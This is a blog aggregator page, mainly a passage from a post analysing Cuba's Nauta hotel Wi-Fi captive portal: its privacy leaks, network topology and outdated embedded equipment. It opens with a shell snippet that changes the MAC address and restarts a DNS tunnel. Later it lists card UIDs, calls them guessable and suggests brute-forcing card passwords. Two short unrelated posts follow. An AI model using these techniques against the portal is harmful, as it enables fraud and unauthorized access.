killall iodine # stop DNS tunnel nmcli n off # turn off wifi to change MAC address macchanger -A wlan0 # change MAC address nmcli n on # turn wifi back on sleep 3 # wait for wifi to settle iodine-client-start # restart DNS tunnel

The Koumbit Wiki has good instructions on how to setup a DNS tunnel. I am wondering if such a public service could be of use for Cubans, although I am not sure how it could be deployed only for Cubans, and what kind of traffic it could support... The fact is that iodine does require a server to operate, and that server must be run on the outside of the censored perimeter, something that Cubans may not be able to afford in the first place.

Another possible way to save money with the captive portal would be to write something that automates connecting and disconnecting from the portal. You would feed that program a list of credentials and it would connect to the portal only on demand, and disconnect as soon as no traffic goes through. There are details on the implementation of the captive portal below that may help future endeavours in that field.

Private information revealed to the captive portal

It should be mentioned, however, that the captive portal has a significant amount of information on clients, which is a direct threat to the online privacy of Cuban internet users. Of course the unique identifiers issued with the Nauta cards can be correlated with your identity, right from the start. For example, I had to give my room number to get a Nauta card issued.

Then the central portal also knows which access point you are connected to. For example, the central portal I was connected to Wifi_Memories_Jibacoa which, for anyone that cares to research, will give them a location of about 20 square meters where I was located when connected (there is only one access point in the whole hotel).

Finally, the central portal also knows my MAC address, a unique identifier for the computer I am using which also reveals which brand of computer I am using (Mac, Lenovo, etc). While this address can be changed, very few people know that, let alone how.

This led me to question whether I would be allowed back in Cuba (or even allowed out!) after publishing this blog post, as it is obvious that I can be easily identified based on the time this article was published, my name and other details. Hopefully the Cuban government will either not notice or not care, but this can be a tricky situation, obviously. I have heard that Cuban prisons are not the best hangout place in Cuba, to say the least...

Network configuration assessment

This section is more technical and delves more deeply in the Cuban internet to analyze the quality and topology of the network, along with hints as to which hardware and providers are being used to support the Cuban government.

Line quality

The internet is actually not so bad in the hotel. Again, this may be because of the very fact that I am in that hotel, and I get a privileged access to the new fiber line to Venezuela, the ALBA-1 link.

The line speed I get is around 1mbps, according to speedtest, which selected a server from LIME in George Town, Cayman Islands:

[1034]anarcat@angela:cuba$ speedtest Retrieving speedtest.net configuration... Retrieving speedtest.net server list... Testing from Empresa de Telecomunicaciones de Cuba (152.206.92.146)... Selecting best server based on latency... Hosted by LIME (George Town) [391.78 km]: 317.546 ms Testing download speed........................................ Download: 1.01 Mbits/s Testing upload speed.................................................. Upload: 1.00 Mbits/s

Latency to the rest of the world is of couse slow:

--- koumbit.org ping statistics --- 122 packets transmitted, 120 received, 1,64% packet loss, time 18731,6ms rtt min/avg/max/sdev = 127,457/156,097/725,211/94,688 ms --- google.com ping statistics --- 122 packets transmitted, 121 received, 0,82% packet loss, time 19371,4ms rtt min/avg/max/sdev = 132,517/160,095/724,971/93,273 ms --- redcta.org.ar ping statistics --- 122 packets transmitted, 120 received, 1,64% packet loss, time 40748,6ms rtt min/avg/max/sdev = 303,035/339,572/965,092/97,503 ms --- ccc.de ping statistics --- 122 packets transmitted, 72 received, 40,98% packet loss, time 19560,2ms rtt min/avg/max/sdev = 244,266/271,670/594,104/61,933 ms

Interestingly, Koumbit is actually the closest host in the above test. It could be that Canadian hosts are less affected by bandwidth problems compared to US hosts because of the embargo.

Network topology

The various traceroutes show a fairly odd network topology, but that is typical of what I would described as "colonized internet users", which have layers and layers of NAT and obscure routing that keep them from the real internet. Just like large corporations are implementing NAT in a large scale, Cuba seems to have layers and layers of private RFC 1918 IPv4 space. A typical traceroute starts with:

traceroute to koumbit.net (199.58.80.33), 30 hops max, 60 byte packets 1 10.156.41.1 (10.156.41.1) 9.724 ms 9.472 ms 9.405 ms 2 192.168.134.137 (192.168.134.137) 16.089 ms 15.612 ms 15.509 ms 3 172.31.252.113 (172.31.252.113) 15.350 ms 15.805 ms 15.358 ms 4 pos6-0-0-agu-cr-1.mpls.enet.cu (172.31.253.197) 15.286 ms 14.832 ms 14.405 ms 5 172.31.252.29 (172.31.252.29) 13.734 ms 13.685 ms 14.485 ms 6 200.0.16.130 (200.0.16.130) 14.428 ms 11.393 ms 10.977 ms 7 200.0.16.74 (200.0.16.74) 10.738 ms 10.019 ms 10.326 ms 8 ix-11-3-1-0.tcore1.TNK-Toronto.as6453.net (64.86.33.45) 108.577 ms 108.449 ms

Let's take this apart line by line:

1 10.156.41.1 (10.156.41.1) 9.724 ms 9.472 ms 9.405 ms

This is my local gateway, probably the hotel's wifi router.

2 192.168.134.137 (192.168.134.137) 16.089 ms 15.612 ms 15.509 ms

This is likely not very far from the local gateway, probably still in Cuba. It in one bit away from the captive portal IP address (see below) so it is very likely related to the captive portal implementation.

3 172.31.252.113 (172.31.252.113) 15.350 ms 15.805 ms 15.358 ms 4 pos6-0-0-agu-cr-1.mpls.enet.cu (172.31.253.197) 15.286 ms 14.832 ms 14.405 ms 5 172.31.252.29 (172.31.252.29) 13.734 ms 13.685 ms 14.485 ms

All those are withing RFC 1918 space. Interestingly, the Cuban DNS servers resolve one of those private IPs as within Cuban space, on line #4. That line is interesting because it reveals the potential use of MPLS.

6 200.0.16.130 (200.0.16.130) 14.428 ms 11.393 ms 10.977 ms 7 200.0.16.74 (200.0.16.74) 10.738 ms 10.019 ms 10.326 ms

Those two lines are the only ones that actually reveal that the route belongs in Cuba at all. Both IPs are in a tiny (/24, or 256 IP addresses) network allocated to ETECSA, the state telco in Cuba:

inetnum: 200.0.16/24 status: allocated aut-num: N/A owner: EMPRESA DE TELECOMUNICACIONES DE CUBA S.A. (IXP CUBA) ownerid: CU-CUBA-LACNIC responsible: Rafael López Guerra address: Ave. Independencia y 19 Mayo, s/n, address: 10600 - La Habana - CH country: CU phone: +53 7 574242 [] owner-c: JOQ tech-c: JOQ abuse-c: JEM52 inetrev: 200.0.16/24 nserver: NS1.NAP.ETECSA.NET nsstat: 20160123 AA nslastaa: 20160123 nserver: NS2.NAP.ETECSA.NET nsstat: 20160123 AA nslastaa: 20160123 created: 20030512 changed: 20140610

Then the last hop:

8 ix-11-3-1-0.tcore1.TNK-Toronto.as6453.net (64.86.33.45) 108.577 ms 108.449 ms 108.257 ms

...interestingly, lands directly in Toronto, in this case going later to Koumbit but that is the first hop that varies according to the destination, hops 1-7 being a common trunk to all external communications. It's also interesting that this shoves a good 90 milliseconds extra in latency, showing that a significant distance and number of equipment crossed. Yet a single hop is crossed, not showing the intermediate step of the Venezuelan link or any other links for that matter. Something obscure is going on there...

Also interesting to note is the traceroute to the redirection host, which is only one hop away:

traceroute to 192.168.134.138 (192.168.134.138), 30 hops max, 60 byte packets 1 192.168.134.138 (192.168.134.138) 6.027 ms 5.698 ms 5.596 ms

Even though it is not the gateway:

$ ip route default via 10.156.41.1 dev wlan0 proto static metric 1024 10.156.41.0/24 dev wlan0 proto kernel scope link src 10.156.41.4 169.254.0.0/16 dev wlan0 scope link metric 1000

This means a very close coordination between the different access points and the captive portal system. Finally, note that there seems to be only three peers to the Cuban internet: Teleglobe, formerly Canadian, now owned by the Indian [[!wiki Tata group]], and Telefónica, the Spanish Telco that colonized most of Latin America's internet, all the way down to Argentina. This is confirmed by my traceroutes, which show traffic to Koumbit going through Tata and Google's going through Telefónica.

Captive portal implementation

The captive portal is https://www.portal-wifi-temas.nauta.cu/ (not accessible outside of Cuba) and uses a self-signed certificate. The domain name resolves to 190.6.81.230 in the hotel.

Accessing http://1.1.1.1/ gives you a status page which allows you to disconnect from the portal. It actually redirects you to https://192.168.134.138/logout.user. That is also a self-signed, but different certificate. That certificate actually reveals the implication of Gemtek which is a "world-leading provider of Wireless Broadband solutions, offering a wide range of solutions from residential to business". It is somewhat unclear if the implication of Gemtek here is deliberate or a misconfiguration on the part of Cuban officials, especially since the certificate is self-signed and was issued in 2002. It could be, however, a trace of the supposed involvement of China in the development of Cuba's networking systems, although Gemtek is based in Taiwan, and not in the China mainland.

That IP, in turn, redirects you to the same portal but in a page that shows you the statistics:

https://www.portal-wifi-temas.nauta.cu/?mac=0024D1717D18&script=logout.user&remain_time=00%3A55%3A52&session_time=00%3A04%3A08&username=151003576287&clientip=10.156.41.21&nasid=Wifi_Memories_Jibacoa&r=ac%2Fpopup

Notice how you see the MAC address of the machine in the URL (randomized, this is not my MAC address), along with the remaining time, session time, client IP and the Wifi access point ESSID. There may be some potential in defrauding the session time there, I haven't tested it directly.

Hitting Actualizar redirects you back to the IP address, which redirects you to the right URL on the portal. The "real" logout is at:

http://192.168.134.138/logout.user?cmd=logout

The login is performed against https://www.portal-wifi-temas.nauta.cu/index.php?r=ac/login with a referer of:

https://www.portal-wifi-temas.nauta.cu/?&nasid=Wifi_Memories_Jibacoa&nasip=192.168.134.138&clientip=10.156.41.21&mac=EC:55:F9:C5:F2:55&ourl=http%3a%2f%2fgoogle.ca%2f&sslport=443&lang=en-US%2cen%3bq%3d0.8&lanip=10.156.41.1

Again, notice the information revealed to the central portal.

Equipment and providers

I ran Nmap probes against both the captive portal and the redirection host, in the hope of finding out how they were built and if they could reveal the source of the equipment used.

The complete nmap probes are available in nmap, but it seems that the captive portal is running some embedded device. It is confusing because the probe for the captive portal responds as if it was the gateway, which blurs even more the distinction between the hotel's gateway and the captive portal. This raises the distinct possibility that all access points are actually captive portal that authenticate to another central server.

The nmap traces do show three distinct hosts however:

  • the captive portal (www.portal-wifi-temas.nauta.cu, 190.6.81.230)
  • some redirection host (192.168.134.138)
  • the hotel's gateway (10.156.41.1)

They do have distinct signatures so the above may be just me misinterpreting traceroute and nmap results. Your comments may help in clarifying the above.

Still, the three devices show up as running Linux, in the two last cases versions between 2.4.21 and 2.4.31. Now, to find out which version of Linux it is running is way more challenging, and it is possible it is just some custom Linux distribution. Indeed, the webserver shows up as G4200.GSI.2.22.0155 and the SSH server is running OpenSSH 3.0.2p1, which is basically prehistoric (2002!) which corroborates the idea that this is some Gemtek embedded device.

The fact that those devices are running 14 years old software should be a concern to the people responsible for those networks. There is, for example, a remote root vulnerability that affects that specific version of OpenSSH, among many other vulnerabilities.

A note on Nauta card's security

Finally, one can note that it is probably trivial to guess card UIDs. All cards i have here start with the prefix 15100, the following digits being 3576 or 4595, presumably depending on the "batch" that was sent to different hotels, which seems to be batches of 1000 cards. You can also correlate the UID with the date at which the card was issued. For example, 15100357XXX cards are all valid until 19/03/2017, and 151004595XXX cards are all valid until 23/03/2017. Here's the list of UIDs I have seen:

151004595313 151004595974 151003576287 151003576105 151003576097

The passwords, on the other hand, do seem fairly random (although my sample size is small). Interestingly, those passwords are also 12 digits long, which is about as strong as a seven-letter password (mixed uppercase and lowercase). If there are no rate-limiting provisions on that captive portal, it could be possible to guess those passwords, since you have free rein on accessing those routers. Depending on the performance of the routers, you could be lucky and find a working password for free...

Conclusion

Clearly, Internet access in Cuba needs to be modernized. We can clearly see that Cuba years behind the rest of the Americas, if only through the percentage of the population with internet access, or download speeds. The existence of a centralized captive portal also enables a huge surveillance potential that should be a concern for any Cuban, or for that matter, anyone wishing to live in a free society.

The answer, however, lies not in the liberalization of commerce and opening the doors to the US companies and their own systems of surveillance. It should be possible, and even desirable for Cubans to establish their own neutral network, a proposal I have made in the past even for here in Québec. This network could be used and improved by Cubans themselves, prioritizing local communities that would establish their own infrastructure according to their own needs. I have been impressed by this article about the El Paquete system - it shows great innovation and initiative from Cubans which are known for engaging in technology in a creative way. This should be leveraged by letting Cubans do what they want with their networks, not telling them what to do.

The best the Googles of this world can do to help Cuba is not to colonize Cuba's technological landscape but to cleanup their own and make their own tools more easily accessible and shareable offline. It is something companies can do right now, something I detailed in a previous article.

Catégories: External Blogs

Epic Lameness

Eric Dorland - lun, 09/01/2008 - 17:26
SF.net now supports OpenID. Hooray! I'd like to make a comment on a thread about the RTL8187se chip I've got in my new MSI Wind. So I go to sign in with OpenID and instead of signing me in it prompts me to create an account with a name, username and password for the account. Huh? I just want to post to their forum, I don't want to create an account (at least not explicitly, if they want to do it behind the scenes fine). Isn't the point of OpenID to not have to create accounts and particularly not have to create new usernames and passwords to access websites? I'm not impressed.
Catégories: External Blogs

Sentiment Sharing

Eric Dorland - lun, 08/11/2008 - 23:28
Biella, I am from there and I do agree. If I was still living there I would try to form a team and make a bid. Simon even made noises about organizing a bid at DebConfs past. I wish he would :)

But a DebConf in New York would be almost as good.
Catégories: External Blogs
Syndiquer le contenu